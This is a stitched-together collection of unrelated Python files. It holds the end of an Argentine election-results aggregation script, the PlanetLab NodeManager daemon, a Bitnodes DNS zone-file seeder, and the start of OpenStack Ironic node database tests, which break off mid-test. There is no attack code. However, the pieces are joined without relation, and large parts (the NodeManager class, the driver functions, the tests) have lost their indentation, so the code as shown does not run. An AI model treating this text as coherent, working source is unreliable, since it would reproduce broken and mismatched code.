    SELECT m.id_establecimiento, p.id_partido, SUM(r.votos) as votos
    FROM resultados_paso r, listas_paso l, partidos_paso p, mesas m
    WHERE r.nro_lista = l.nro_lista
    AND l.id_partido = p.id_partido
    AND m.id_mesa = r.id_mesa
    GROUP BY m.id_establecimiento, p.id_partido;
    '''
    aggregated = []
    for record in db.query(q):
        # SUM() may come back as Decimal/long depending on the backend.
        record['votos'] = int(record['votos'])
        aggregated.append(record)
    db['votos_establecimiento_paso'].insert_many(aggregated, chunk_size=1000)
def paso_classify_votes_by_poll_station():
    '''Total blank/valid/positive/invalid PASO votes per polling station.'''
    q = '''
    SELECT id_establecimiento,
    SUM(CASE WHEN id_partido = 'BLC'
    THEN votos else 0 end) as blancos,
    SUM(CASE WHEN id_partido not in ('NUL', 'REC', 'IMP')
    THEN votos else 0 end) as validos,
    SUM(CASE WHEN id_partido not in ('BLC', 'NUL', 'REC', 'IMP')
    THEN votos else 0 end) as positivos,
    SUM(CASE WHEN id_partido in ('NUL', 'REC', 'IMP')
    THEN votos else 0 end) as invalidos
    FROM votos_establecimiento_paso
    GROUP BY id_establecimiento
    '''
    int_columns = ('id_establecimiento', 'blancos', 'validos',
                   'positivos', 'invalidos')
    totals = []
    for record in db.query(q):
        # Normalize every aggregate column to a plain int.
        for column in int_columns:
            record[column] = int(record[column])
        totals.append(record)
    db['totales_establecimiento_paso'].insert_many(totals)
def paso_winner_cache_table():
    # Build the per-station winners cache: for each polling station, the
    # party with the most votes (rank 1) and its margin over the runner-up,
    # joined with station metadata and the classified vote totals.
    # Table names are spliced in via %-formatting from trusted constants
    # (not user input).  Uses row_number()/lead() window functions, so the
    # backend must support them (e.g. PostgreSQL).
    q = '''
    WITH %(winner)s AS (SELECT id_establecimiento, id_partido, votos,
    row_number() over(partition by id_establecimiento
    ORDER BY votos DESC) as rank,
    (votos - lead(votos,1,0) over(partition by id_establecimiento
    ORDER BY votos DESC)) as margin_victory
    FROM %(table_votes)s
    ORDER BY id_establecimiento, rank)
    SELECT e.id_establecimiento as id_establecimiento,
    e.id_comuna, e.geom,
    e.domicilio, e.descripcion,
    e.electores,
    t.positivos, sqrt(t.positivos) as sqrt_positivos,
    (t.validos + t.invalidos) as votantes,
    w.id_partido, w.votos, w.margin_victory
    FROM %(table_polling)s e, %(winner)s w, %(table_totals)s t
    WHERE e.id_establecimiento = w.id_establecimiento
    AND e.id_establecimiento = w.id_establecimiento
    AND e.id_establecimiento = t.id_establecimiento
    AND w.rank = 1;
    ''' % {'table_polling': 'establecimientos',
           'table_votes': 'votos_establecimiento_paso',
           'table_totals': 'totales_establecimiento_paso',
           'winner': 'winner'}
    results = db.query(q)
    cache_table = db['cache_winner_paso']
    cache_table.insert_many(results)
def caba_import_lists(fname):
    ''' import lists CSV '''
    table = db.create_table('listas_caba',
                            primary_id='id_lista',
                            primary_type='String(3)')
    handle = open(fname, 'r')
    # First line is the header: strip quotes, split into column names.
    header = handle.readline().replace("\"", "").strip().split(',')
    reader = csv.DictReader(handle, header)
    rows = []
    for record in reader:
        converted = {}
        for column, raw in record.iteritems():
            if column in SCHEMA_CABA_LISTS_NUMERIC:
                target = SCHEMA_CABA_LISTS_NUMERIC[column]
                converted[target] = int(raw) if raw else None
            else:
                converted[column] = raw.decode('utf-8')
        rows.append(converted)
    table.insert_many(rows)
def caba_import_results(fname):
    ''' import caba results by polling table CSV '''
    # Plain table lookup (no explicit primary key), unlike the dictionaries.
    t = db['resultados_caba']
    f = open(fname, 'r')
    # First line is the header: strip quotes, split into column names.
    fields = f.readline().replace("\"", "").strip().split(',')
    c = csv.DictReader(f, fields)
    results = []
    for row in c:
        t_results = {}
        for k, v in row.iteritems():  # Python 2 dict iteration
            if k in SCHEMA_RESULTS_CABA_NUMERIC.keys():
                # Rename per schema and cast to int (empty string -> None).
                kt = SCHEMA_RESULTS_CABA_NUMERIC[k]
                t_results[kt] = int(v) if v else None
            if k not in SCHEMA_RESULTS_CABA_NUMERIC.keys():
                t_results[k] = v.decode('utf-8')
        # Randomize votes
        # NOTE(review): disabled simulation hook, kept for dry runs.
        #votos = t_results["votos"]
        #t_results["votos"] = randomized_int_by_perc(votos, 10)
        results.append(t_results)
    t.insert_many(results, chunk_size=50000)
def caba_results_by_poll_station_party():
    '''Aggregate CABA votes per polling station and political party,
    storing the totals in votos_establecimiento_caba.'''
    query = '''
    SELECT m.id_establecimiento, l.id_partido, SUM(r.votos) as votos
    FROM resultados_caba r, listas_caba l, mesas m
    WHERE r.nro_lista = l.nro_lista
    AND m.id_mesa = r.id_mesa
    GROUP BY m.id_establecimiento, l.id_partido;
    '''
    rows = []
    for record in db.query(query):
        # SUM() comes back as Decimal/str depending on backend; normalize.
        record['votos'] = int(record['votos'])
        rows.append(record)
    target = db['votos_establecimiento_caba']
    target.insert_many(rows, chunk_size=1000)
def caba_classify_votes_by_poll_station():
    '''Total blank/valid/positive/invalid votes for each CABA polling
    station and store them in totales_establecimiento_caba.'''
    query = '''
    SELECT id_establecimiento,
        SUM(CASE WHEN id_partido = 'BLC'
            THEN votos else 0 end) as blancos,
        SUM(CASE WHEN id_partido not in ('NUL', 'REC', 'IMP', 'TEC')
            THEN votos else 0 end) as validos,
        SUM(CASE WHEN id_partido not in ('BLC', 'NUL', 'REC', 'IMP', 'TEC')
            THEN votos else 0 end) as positivos,
        SUM(CASE WHEN id_partido in ('NUL', 'REC', 'IMP', 'TEC')
            THEN votos else 0 end) as invalidos
    FROM votos_establecimiento_caba
    GROUP BY id_establecimiento
    '''
    # Every aggregated column must be a plain int before insertion.
    int_fields = ('id_establecimiento', 'blancos', 'validos',
                  'positivos', 'invalidos')
    rows = []
    for record in db.query(query):
        for field in int_fields:
            record[field] = int(record[field])
        rows.append(record)
    target = db['totales_establecimiento_caba']
    target.insert_many(rows)
def caba_winner_cache_table():
    '''Build cache_winner_caba: one denormalized row per polling station
    with the winning party, its votes and the margin over the runner-up,
    ready for CartoDB rendering.

    FIX: the previous query repeated the predicate
    "e.id_establecimiento = w.id_establecimiento" twice; the duplicate
    was redundant and has been removed (result set is unchanged).
    '''
    q = '''
    WITH %(winner)s AS (SELECT id_establecimiento, id_partido, votos,
        row_number() over(partition by id_establecimiento
        ORDER BY votos DESC) as rank,
        (votos - lead(votos,1,0) over(partition by id_establecimiento
        ORDER BY votos DESC)) as margin_victory
        FROM %(table_votes)s
        ORDER BY id_establecimiento, rank)
    SELECT e.id_establecimiento as id_establecimiento,
        e.id_comuna, e.geom,
        e.domicilio, e.descripcion,
        e.electores,
        t.positivos, sqrt(t.positivos) as sqrt_positivos,
        (t.validos + t.invalidos) as votantes,
        w.id_partido, w.votos, w.margin_victory
    FROM %(table_polling)s e, %(winner)s w, %(table_totals)s t
    WHERE e.id_establecimiento = w.id_establecimiento
    AND e.id_establecimiento = t.id_establecimiento
    AND w.rank = 1;
    ''' % {'table_polling': 'establecimientos',
           'table_votes': 'votos_establecimiento_caba',
           'table_totals': 'totales_establecimiento_caba',
           'winner': 'winner'}
    results = db.query(q)
    cache_table = db['cache_winner_caba']
    cache_table.insert_many(results)
def caba_diff_table():
    '''Compute, per polling station and party, the vote difference
    between the final (CABA) and primary (PASO) elections, storing
    the result in cache_diff_caba. Blank/invalid pseudo-parties are
    excluded.'''
    query = '''
    SELECT vc.id_establecimiento, vc.id_partido,
        vc.votos, (vc.votos - vp.votos) as diferencia
    FROM votos_establecimiento_caba vc,
        votos_establecimiento_paso vp
    WHERE vc.id_establecimiento = vp.id_establecimiento
    and vc.id_partido = vp.id_partido
    and vc.id_partido NOT IN ('BLC','IMP','REC','NUL','TEC')
    '''
    rows = db.query(query)
    db['cache_diff_caba'].insert_many(rows)
def caba_polling_with_totals_table():
    '''Denormalize each polling station together with its CABA vote
    totals into establecimientos_totales_caba.'''
    query = '''
    SELECT e.*, tc.positivos, tc.validos, (tc.validos + tc.invalidos) as votantes
    FROM establecimientos e,
        totales_establecimiento_caba tc
    WHERE e.id_establecimiento = tc.id_establecimiento
    '''
    rows = db.query(query)
    db['establecimientos_totales_caba'].insert_many(rows)
def process_results():
print "clear DB"
#clearDB()
print "import common data"
import_common_data()
print "process PASO data"
process_PASO()
print "process CABA data"
process_CABA()
print "create cartodb cache tables"
process_cartodb()
def import_common_data():
print "import polling station data"
import_poll_stations('%s/%s'
% (GEO_DATADICT_PATH, POLLING_STATIONS_DATA_FILE))
print "import polling tables data"
import_poll_tables('%s/%s'
% (PASO_DATADICT_PATH, POLLING_TABLES_DATA_FILE))
def process_PASO():
print "import paso lists"
paso_import_lists('%s/%s'
% (PASO_DATADICT_PATH, LISTS_DATA_FILE))
print "import paso parties"
paso_import_parties('%s/%s'
% (PASO_DATADICT_PATH, PARTIES_DATA_FILE))
print "import paso results"
paso_import_results('%s/%s'
% (PASO_RESULTS_PATH, RESULTS_DATA_FILE))
print "aggregate paso results by polling station and party"
paso_results_by_poll_station_party()
print "classify paso votes by polling station"
paso_classify_votes_by_poll_station()
def process_CABA():
print "import caba lists"
caba_import_lists('%s/%s'
% (CABA_DATADICT_PATH, LISTS_DATA_FILE))
print "import caba results"
caba_import_results('%s/%s'
% (CABA_RESULTS_PATH, RESULTS_DATA_FILE))
print "aggregate results by polling station and party"
caba_results_by_poll_station_party()
print "classify votes by polling station"
caba_classify_votes_by_poll_station()
def process_cartodb():
print "create CABA winner unnormalized table for cartodb performance"
paso_winner_cache_table()
print "create PASO winner unnormalized table for cartodb performance"
caba_winner_cache_table()
print "create PASO diff unnormalized table for cartodb performance"
caba_diff_table()
print "create polling stations with totals"
caba_polling_with_totals_table()
if __name__ == "__main__":
    # Open the dataset connection once; every step reuses the module-level
    # handle `db`.
    db = connect_dataset()
    process_results()
| |
#!/usr/bin/python
#
# Useful information can be found at https://svn.planet-lab.org/wiki/NodeManager
#
# Faiyaz Ahmed <faiyaza at cs dot princeton dot edu>
# Copyright (C) 2008 The Trustees of Princeton University
"""Node Manager"""
import optparse
import time
import xmlrpclib
import socket
import os
import sys
import resource
import glob
import pickle
import logger
import tools
from config import Config
from plcapi import PLCAPI
import random
class NodeManager:
PLUGIN_PATH = "/usr/share/NodeManager/plugins"
DB_FILE = "/var/lib/nodemanager/getslivers.pickle"
# the modules in this directory that need to be run
# NOTE: modules listed here will also be loaded in this order
# once loaded, they get re-ordered after their priority (lower comes first)
# for determining the runtime order
core_modules=['net', 'conf_files', 'slivermanager', 'bwmon']
default_period=600
default_random=301
default_priority=100
def __init__ (self):
parser = optparse.OptionParser()
parser.add_option('-d', '--daemon', action='store_true', dest='daemon', default=False,
help='run daemonized')
parser.add_option('-f', '--config', action='store', dest='config', default='/etc/planetlab/plc_config',
help='PLC configuration file')
parser.add_option('-k', '--session', action='store', dest='session', default='/etc/planetlab/session',
help='API session key (or file)')
parser.add_option('-p', '--period', action='store', dest='period', default=NodeManager.default_period,
help='Polling interval (sec) - default %d'%NodeManager.default_period)
parser.add_option('-r', '--random', action='store', dest='random', default=NodeManager.default_random,
help='Range for additional random polling interval (sec) -- default %d'%NodeManager.default_random)
parser.add_option('-v', '--verbose', action='store_true', dest='verbose', default=False,
help='more verbose log')
parser.add_option('-P', '--path', action='store', dest='path', default=NodeManager.PLUGIN_PATH,
help='Path to plugins directory')
# NOTE: BUG the 'help' for this parser.add_option() wont list plugins from the --path argument
parser.add_option('-m', '--module', action='store', dest='user_module', default='', help='run a single module')
(self.options, args) = parser.parse_args()
if len(args) != 0:
parser.print_help()
sys.exit(1)
# determine the modules to be run
self.modules = NodeManager.core_modules
# Deal with plugins directory
if os.path.exists(self.options.path):
sys.path.append(self.options.path)
plugins = [ os.path.split(os.path.splitext(x)[0])[1] for x in glob.glob( os.path.join(self.options.path,'*.py') ) ]
self.modules += plugins
if self.options.user_module:
assert self.options.user_module in self.modules
self.modules=[self.options.user_module]
logger.verbose('nodemanager: Running single module %s'%self.options.user_module)
def GetSlivers(self, config, plc):
"""Retrieves GetSlivers at PLC and triggers callbacks defined in modules/plugins"""
try:
logger.log("nodemanager: Syncing w/ PLC")
# retrieve GetSlivers from PLC
data = plc.GetSlivers()
# use the magic 'default' slice to retrieve system-wide defaults
self.getPLCDefaults(data, config)
# tweak the 'vref' attribute from GetSliceFamily
self.setSliversVref (data)
# dump it too, so it can be retrieved later in case of comm. failure
self.dumpSlivers(data)
# log it for debug purposes, no matter what verbose is
logger.log_slivers(data)
logger.verbose("nodemanager: Sync w/ PLC done")
last_data=data
except:
logger.log_exc("nodemanager: failed in GetSlivers")
# XXX So some modules can at least boostrap.
logger.log("nodemanager: Can't contact PLC to GetSlivers(). Continuing.")
data = {}
# for modules that request it though the 'persistent_data' property
last_data=self.loadSlivers()
# Invoke GetSlivers() functions from the callback modules
for module in self.loaded_modules:
logger.verbose('nodemanager: triggering %s.GetSlivers'%module.__name__)
try:
callback = getattr(module, 'GetSlivers')
module_data=data
if getattr(module,'persistent_data',False):
module_data=last_data
callback(data, config, plc)
except:
logger.log_exc("nodemanager: GetSlivers failed to run callback for module %r"%module)
def getPLCDefaults(self, data, config):
"""
Get PLC wide defaults from _default system slice. Adds them to config class.
"""
for slice in data.get('slivers'):
if slice['name'] == config.PLC_SLICE_PREFIX+"_default":
attr_dict = {}
for attr in slice.get('attributes'): attr_dict[attr['tagname']] = attr['value']
if len(attr_dict):
logger.verbose("nodemanager: Found default slice overrides.\n %s" % attr_dict)
config.OVERRIDES = attr_dict
return
# NOTE: if an _default slice existed, it would have been found above and
# the routine would return. Thus, if we've gotten here, then no default
# slice is bound to this node.
if 'OVERRIDES' in dir(config): del config.OVERRIDES
def setSliversVref (self, data):
"""
Tweak the 'vref' attribute in all slivers based on the 'GetSliceFamily' key
"""
# GetSlivers exposes the result of GetSliceFamily() as an separate key in data
# It is safe to override the attributes with this, as this method has the right logic
for sliver in data.get('slivers'):
try:
slicefamily=sliver.get('GetSliceFamily')
for att in sliver['attributes']:
if att['tagname']=='vref':
att['value']=slicefamily
continue
sliver['attributes'].append({ 'tagname':'vref','value':slicefamily})
except:
logger.log_exc("nodemanager: Could not overwrite 'vref' attribute from 'GetSliceFamily'",name=sliver['name'])
def dumpSlivers (self, slivers):
f = open(NodeManager.DB_FILE, "w")
logger.log ("nodemanager: saving successfully fetched GetSlivers in %s" % NodeManager.DB_FILE)
pickle.dump(slivers, f)
f.close()
def loadSlivers (self):
try:
f = open(NodeManager.DB_FILE, "r+")
logger.log("nodemanager: restoring latest known GetSlivers from %s" % NodeManager.DB_FILE)
slivers = pickle.load(f)
f.close()
return slivers
except:
logger.log("Could not restore GetSlivers from %s" % NodeManager.DB_FILE)
return {}
def run(self):
try:
if self.options.daemon: tools.daemon()
# set log level
if (self.options.verbose):
logger.set_level(logger.LOG_VERBOSE)
# Load /etc/planetlab/plc_config
config = Config(self.options.config)
try:
other_pid = tools.pid_file()
if other_pid != None:
print """There might be another instance of the node manager running as pid %d.
If this is not the case, please remove the pid file %s. -- exiting""" % (other_pid, tools.PID_FILE)
return
except OSError, err:
print "Warning while writing PID file:", err
# load modules
self.loaded_modules = []
for module in self.modules:
try:
m = __import__(module)
logger.verbose("nodemanager: triggering %s.start"%m.__name__)
m.start()
self.loaded_modules.append(m)
except ImportError, err:
print "Warning while loading module %s:" % module, err
# sort on priority (lower first)
def sort_module_priority (m1,m2):
return getattr(m1,'priority',NodeManager.default_priority) - getattr(m2,'priority',NodeManager.default_priority)
self.loaded_modules.sort(sort_module_priority)
logger.log('ordered modules:')
for module in self.loaded_modules:
logger.log ('%s: %s'%(getattr(module,'priority',NodeManager.default_priority),module.__name__))
# Load /etc/planetlab/session
if os.path.exists(self.options.session):
session = file(self.options.session).read().strip()
else:
session = None
# get random periods
iperiod=int(self.options.period)
irandom=int(self.options.random)
# Initialize XML-RPC client
plc = PLCAPI(config.plc_api_uri, config.cacert, session, timeout=iperiod/2)
#check auth
logger.log("nodemanager: Checking Auth.")
while plc.check_authentication() != True:
try:
plc.update_session()
logger.log("nodemanager: Authentication Failure. Retrying")
except Exception,e:
logger.log("nodemanager: Retry Failed. (%r); Waiting.."%e)
time.sleep(iperiod)
logger.log("nodemanager: Authentication Succeeded!")
while True:
# Main nodemanager Loop
logger.log('nodemanager: mainloop - calling GetSlivers - period=%d random=%d'%(iperiod,irandom))
self.GetSlivers(config, plc)
delay=iperiod + random.randrange(0,irandom)
logger.log('nodemanager: mainloop - sleeping for %d s'%delay)
time.sleep(delay)
except: logger.log_exc("nodemanager: failed in run")
def run():
    """Module-level entry point: log a startup banner, then build and run
    a NodeManager instance."""
    logger.log("======================================== Entering nodemanager.py")
    NodeManager().run()
# Run directly as a script, or spawn a daemon thread when imported
# interactively for debugging.
if __name__ == '__main__':
    run()
else:
    # This is for debugging purposes. Open a copy of Python and import nodemanager
    tools.as_daemon_thread(run)
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# seeder.py - Exports reachable nodes into DNS zone files for DNS seeder.
#
# Copyright (c) Addy Yeow Chin Heng <ayeowch@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
Exports reachable nodes into DNS zone files for DNS seeder.
"""
import glob
import json
import logging
import operator
import os
import random
import sys
import time
from collections import defaultdict
from ConfigParser import ConfigParser
from utils import new_redis_conn
REDIS_CONN = None
CONF = {}
class Seeder(object):
    """
    Implements seeding mechanic by exporting reachable nodes as A and AAAA
    records into DNS zone files. A separate DNS server software is expected to
    consume and serve the zone files to the public.
    """
    def __init__(self):
        self.dump = None  # path of the last snapshot successfully loaded
        self.nodes = []  # raw node tuples from the snapshot
        self.addresses = defaultdict(list)  # service bits -> [address, ...]
        self.now = 0  # timestamp of the current export run

    def export_nodes(self, dump):
        """
        Exports nodes to generate A and AAAA records from the latest snapshot.
        """
        self.now = int(time.time())
        if dump != self.dump:
            try:
                # FIX: close the snapshot file deterministically instead of
                # relying on refcounting.
                dump_file = open(dump, "r")
                try:
                    self.nodes = json.loads(dump_file.read(),
                                            encoding="latin-1")
                finally:
                    dump_file.close()
            except ValueError:
                # Snapshot is still being written; retry on the next cycle.
                logging.warning("Write pending")
                return
            if len(self.nodes) == 0:
                logging.warning("len(self.nodes): %d", len(self.nodes))
                return
            # Re-bucket addresses by their advertised service bits.
            self.addresses = defaultdict(list)
            for address, services in self.filter_nodes():
                self.addresses[services].append(address)
            self.dump = dump
        self.save_zone_files()

    def save_zone_files(self):
        """
        Saves A and AAAA records in DNS zone files.
        """
        default_zone = os.path.basename(CONF['zone_file'])
        # Zone 0 is the default zone (all NODE_NETWORK nodes); zones x1..xf
        # each expose nodes with exactly that service-bit value.
        for i in range(0xf + 1):
            if i == 0:
                zone = default_zone
                zone_file = CONF['zone_file']
                wildcard = "".join([
                    "\n",
                    "*.{0}.\tIN\tCNAME\t{0}.".format(default_zone),
                ])
                addresses = []
                for services, addrs in self.addresses.iteritems():
                    if services & 1 == 1:  # NODE_NETWORK
                        addresses.extend(addrs)
            else:
                zone = 'x%x.%s' % (i, default_zone)
                zone_file = CONF['zone_file'].replace(default_zone, zone)
                wildcard = ""
                addresses = self.addresses[i]
            logging.debug("Zone file: %s", zone_file)
            serial = str(self.now)
            logging.debug("Serial: %s", serial)
            # FIX: close the template and zone files explicitly (previously
            # left to the garbage collector).
            with open(CONF['template'], "r") as template_file:
                template = template_file.read() \
                    .replace("1501826735", serial) \
                    .replace("seed.bitnodes.io.", zone.replace("zone", ""))
            content = "".join([
                template,
                wildcard,
                "\n",
                self.get_records(addresses),
            ]).strip() + "\n"
            with open(zone_file, "w") as out_file:
                out_file.write(content)

    def get_records(self, addresses):
        """
        Returns addresses formatted in A, AAAA, TXT records for a zone file.
        """
        a_records = []
        aaaa_records = []
        txt_records = []
        for address in addresses:
            if address.endswith(".onion"):
                # Onion addresses cannot be A/AAAA records; expose as TXT.
                txt_records.append("@\tIN\tTXT\t{}".format(address))
            elif ":" in address:
                aaaa_records.append("@\tIN\tAAAA\t{}".format(address))
            else:
                a_records.append("@\tIN\tA\t{}".format(address))
        logging.debug("A records: %d", len(a_records))
        logging.debug("AAAA records: %d", len(aaaa_records))
        logging.debug("TXT records: %d", len(txt_records))
        # Shuffle so each rebuild advertises a rotating subset of records.
        random.shuffle(a_records)
        random.shuffle(aaaa_records)
        random.shuffle(txt_records)
        records = "".join([
            "\n".join(a_records[:CONF['a_records']]),
            "\n",
            "\n".join(aaaa_records[:CONF['aaaa_records']]),
            "\n",
            "\n".join(txt_records[:CONF['txt_records']]),
        ])
        return records

    def filter_nodes(self):
        """
        Returns nodes that satisfy the minimum requirements listed below:
        1) Height must be at most 2 blocks away from the consensus height
        2) Uptime must be equal or greater than the configured min. age
        3) Max. one node per ASN
        4) Uses default port
        """
        consensus_height = self.get_consensus_height()
        min_age = self.get_min_age()
        asns = set()
        for node in self.nodes:
            # Snapshot rows are positional tuples; see the crawler's format.
            address = node[0]
            port = node[1]
            age = self.now - node[4]
            services = node[5]
            height = node[6]
            asn = node[13]
            if port != CONF['port'] or asn is None or age < min_age:
                continue
            if consensus_height and abs(consensus_height - height) > 2:
                continue
            # Onion addresses are exempt from the one-node-per-ASN rule.
            if asn in asns and not address.endswith(".onion"):
                continue
            yield address, services
            asns.add(asn)

    def get_consensus_height(self):
        """
        Returns the most common height from Redis.
        """
        height = REDIS_CONN.get('height')
        if height:
            height = int(height)
        logging.info("Consensus. height: %s", height)
        return height

    def get_min_age(self):
        """
        Returns the minimum required uptime. If the oldest node cannot satisfy
        the configured value, use a fallback value of max. 1 percent away from
        the uptime of the oldest node.
        """
        min_age = CONF['min_age']
        oldest = self.now - min(self.nodes, key=operator.itemgetter(4))[4]
        logging.info("Longest uptime: %d", oldest)
        if oldest < min_age:
            min_age = oldest - (0.01 * oldest)  # Max. 1% newer than oldest
        logging.info("Min. age: %d", min_age)
        return min_age
def cron():
    """
    Poll the export directory forever, feeding the newest snapshot to a
    single Seeder instance so the DNS zone files stay current.
    """
    exporter = Seeder()
    while True:
        time.sleep(5)
        pattern = "{}/*.json".format(CONF['export_dir'])
        try:
            latest = max(glob.iglob(pattern))
        except ValueError as err:
            # max() raises ValueError when the glob is empty (no snapshot yet).
            logging.warning(err)
            continue
        logging.info("Dump: %s", latest)
        exporter.export_nodes(latest)
def init_conf(argv):
    """
    Populates CONF with key-value pairs from configuration file.
    """
    parser = ConfigParser()
    parser.read(argv[1])
    # String-valued settings.
    for key in ('logfile', 'export_dir', 'zone_file', 'template'):
        CONF[key] = parser.get('seeder', key)
    # Integer-valued settings.
    for key in ('port', 'db', 'min_age',
                'a_records', 'aaaa_records', 'txt_records'):
        CONF[key] = parser.getint('seeder', key)
    CONF['debug'] = parser.getboolean('seeder', 'debug')
    # Make sure the directory that will hold the zone files exists.
    zone_dir = os.path.dirname(CONF['zone_file'])
    if not os.path.exists(zone_dir):
        os.makedirs(zone_dir)
def main(argv):
    """Entry point: validate arguments, set up conf/logging/Redis, run cron."""
    if len(argv) < 2 or not os.path.exists(argv[1]):
        print("Usage: seeder.py [config]")
        return 1

    # Initialize global conf
    init_conf(argv)

    # Initialize logger
    loglevel = logging.DEBUG if CONF['debug'] else logging.INFO
    logformat = ("%(asctime)s,%(msecs)05.1f %(levelname)s (%(funcName)s) "
                 "%(message)s")
    logging.basicConfig(level=loglevel,
                        format=logformat,
                        filename=CONF['logfile'],
                        filemode='w')
    print("Log: {}, press CTRL+C to terminate..".format(CONF['logfile']))

    global REDIS_CONN
    REDIS_CONN = new_redis_conn(db=CONF['db'])

    cron()

    return 0
# Script entry point: propagate main()'s status code as the exit code.
if __name__ == '__main__':
    sys.exit(main(sys.argv))
| |
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for manipulating Nodes via the DB API"""
import datetime
import mock
from oslo_utils import timeutils
from oslo_utils import uuidutils
import six
from ironic.common import exception
from ironic.common import states
from ironic.tests.db import base
from ironic.tests.db import utils
class DbNodeTestCase(base.DbTestCase):
def test_create_node(self):
utils.create_test_node()
def test_create_node_already_exists(self):
utils.create_test_node()
self.assertRaises(exception.NodeAlreadyExists,
utils.create_test_node)
def test_create_node_instance_already_associated(self):
instance = uuidutils.generate_uuid()
utils.create_test_node(uuid=uuidutils.generate_uuid(),
instance_uuid=instance)
self.assertRaises(exception.InstanceAssociated,
utils.create_test_node,
uuid=uuidutils.generate_uuid(),
instance_uuid=instance)
def test_create_node_name_duplicate(self):
node = utils.create_test_node(name='spam')
self.assertRaises(exception.DuplicateName,
utils.create_test_node,
name=node.name)
def test_get_node_by_id(self):
node = utils.create_test_node()
res = self.dbapi.get_node_by_id(node.id)
self.assertEqual(node.id, res.id)
self.assertEqual(node.uuid, res.uuid)
def test_get_node_by_uuid(self):
node = utils.create_test_node()
res = self.dbapi.get_node_by_uuid(node.uuid)
self.assertEqual(node.id, res.id)
self.assertEqual(node.uuid, res.uuid)
def test_get_node_by_name(self):
node = utils.create_test_node()
res = self.dbapi.get_node_by_name(node.name)
self.assertEqual(node.id, res.id)
self.assertEqual(node.uuid, res.uuid)
self.assertEqual(node.name, res.name)
def test_get_node_that_does_not_exist(self):
self.assertRaises(exception.NodeNotFound,
self.dbapi.get_node_by_id, 99)
self.assertRaises(exception.NodeNotFound,
self.dbapi.get_node_by_uuid,
'12345678-9999-0000-aaaa-123456789012')
self.assertRaises(exception.NodeNotFound,
self.dbapi.get_node_by_name,
'spam-eggs-bacon-spam')
def test_get_nodeinfo_list_defaults(self):
node_id_list = []
for i in range(1, 6):
node = utils.create_test_node(uuid=uuidutils.generate_uuid())
node_id_list.append(node.id)
res = [i[0] for i in self.dbapi.get_nodeinfo_list()]
self.assertEqual(sorted(res), sorted(node_id_list))
def test_get_nodeinfo_list_with_cols(self):
uuids = {}
extras = {}
for i in range(1, 6):
uuid = uuidutils.generate_uuid()
extra = {'foo': i}
node = utils.create_test_node(extra=extra, uuid=uuid)
uuids[node.id] = uuid
extras[node.id] = extra
res = self.dbapi.get_nodeinfo_list(columns=['id', 'extra', 'uuid'])
self.assertEqual(extras, dict((r[0], r[1]) for r in res))
self.assertEqual(uuids, dict((r[0], r[2]) for r in res))
def test_get_nodeinfo_list_with_filters(self):
node1 = utils.create_test_node(driver='driver-one',
instance_uuid=uuidutils.generate_uuid(),
reservation='fake-host',
uuid=uuidutils.generate_uuid())
node2 = utils.create_test_node(driver='driver-two',
uuid=uuidutils.generate_uuid(),
maintenance=True)
res = self.dbapi.get_nodeinfo_list(filters={'driver': 'driver-one'})
self.assertEqual([node1.id], [r[0] for r in res])
res = self.dbapi.get_nodeinfo_list(filters={'driver': 'bad-driver'})
self.assertEqual([], [r[0] for r in res])
res = self.dbapi.get_nodeinfo_list(filters={'associated': True})
self.assertEqual([node1.id], [r[0] for r in res])
res = self.dbapi.get_nodeinfo_list(filters={'associated': False})
self.assertEqual([node2.id], [r[0] for r in res])
res = self.dbapi.get_nodeinfo_list(filters={'reserved': True})
self.assertEqual([node1.id], [r[0] for r in res])
res = self.dbapi.get_nodeinfo_list(filters={'reserved': False})
self.assertEqual([node2.id], [r[0] for r in res])
res = self.dbapi.get_node_list(filters={'maintenance': True})
self.assertEqual([node2.id], [r.id for r in res])
res = self.dbapi.get_node_list(filters={'maintenance': False})
self.assertEqual([node1.id], [r.id for r in res])
@mock.patch.object(timeutils, 'utcnow', autospec=True)
def test_get_nodeinfo_list_provision(self, mock_utcnow):
past = datetime.datetime(2000, 1, 1, 0, 0)
next = past + datetime.timedelta(minutes=8)
present = past + datetime.timedelta(minutes=10)
mock_utcnow.return_value = past
# node with provision_updated timeout
node1 = utils.create_test_node(uuid=uuidutils.generate_uuid(),
provision_updated_at=past)
# node with None in provision_updated_at
node2 = utils.create_test_node(uuid=uuidutils.generate_uuid(),
provision_state=states.DEPLOYWAIT)
# node without timeout
utils.create_test_node(uuid=uuidutils.generate_uuid(),
provision_updated_at=next)
mock_utcnow.return_value = present
res = self.dbapi.get_nodeinfo_list(filters={'provisioned_before': 300})
self.assertEqual([node1.id], [r[0] for r in res])
res = self.dbapi.get_nodeinfo_list(filters={'provision_state':
states.DEPLOYWAIT})
self.assertEqual([node2.id], [r[0] for r in res])
@mock.patch.object(timeutils, 'utcnow', autospec=True)
def test_get_nodeinfo_list_inspection(self, mock_utcnow):
past = datetime.datetime(2000, 1, 1, 0, 0)
next = past + datetime.timedelta(minutes=8)
present = past + datetime.timedelta(minutes=10)
mock_utcnow.return_value = past
# node with provision_updated timeout
